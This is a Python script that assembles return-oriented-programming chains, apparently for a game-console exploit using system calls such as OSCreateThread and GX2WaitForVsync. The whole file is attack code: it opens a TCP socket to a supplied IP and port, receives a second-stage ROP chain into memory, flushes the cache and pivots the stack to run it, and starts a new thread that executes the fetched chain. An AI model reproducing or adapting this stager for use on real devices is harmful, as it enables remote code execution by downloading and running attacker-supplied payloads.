from ropgadgets import * from common_defines import * def tcp_thread_ropchain_calls(data_addr): cur_chain = [] # create a socket cur_chain += socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) cur_chain += write_r3r4_tomem(0x4D055000) # save result to memory # connect(socket_fd, &sin, 0x10) cur_chain += call_with_dereferenced_r3(ROP_connect, 0x4D055000, data_addr, 0x10); # will use the value at address (0x4D055000) as arg1, not the address itself! # improve stability by waiting a bit cur_chain += GX2WaitForVsync() cur_chain += GX2WaitForVsync() # receive the rop chain cur_chain += recv(4, 0x4D900014, 0x8000, 0) cur_chain += DCFlushRange(0x4D900010, 0x8000) # execute received rop chain! cur_chain += StackPivot(0x4D900010) return cur_chain def tcp_thread_ropchain_data(ip, port): cur_chain = [] # + port cur_chain.append(0x00020000 + port) cur_chain.append((ip[0] << 24) | (ip[1] << 16) | (ip[2] << 8) | (ip[3] << 0)) cur_chain.append(0) cur_chain.append(0) return cur_chain def tcp_thread_ropchain(base, ip, port): # Calculate offsets call_len = len(tcp_thread_ropchain_calls(0)) * 4 cur_chain = [] # Build real ropchain cur_chain += tcp_thread_ropchain_calls(base + call_len) cur_chain += tcp_thread_ropchain_data(ip, port) return cur_chain def create_thread_ropchain(new_ropchain_addr): cur_chain = [] # Flush the whole ropchain cur_chain += DCFlushRange(0x387D3664, 0x500) # Create thread cur_chain += OSCreateThread(0x4D066000, ROP_POP_R24_TO_R31, 0, 0, 0x4D070000, 0x8000, 0, 2 | 8) # Override the stack with a new ROP Chain cur_chain += memcpy(0x4D070000 + 0x14, new_ropchain_addr, 0x400) cur_chain += DCFlushRange(0x4D066000, 0x20000) cur_chain += OSResumeThread(0x4D066000) cur_chain.append(ROP_OSExitThread) return cur_chain def tcp_ropchain(ip, port, payloadAddress): cur_chain = [] # Calculate offsets rop_len = len(create_thread_ropchain(0)) * 4 # Build real ropchain cur_chain += create_thread_ropchain(0x387D36AC + rop_len) cur_chain += tcp_thread_ropchain(0x4D070000 + 0x14, ip, port) return cur_chain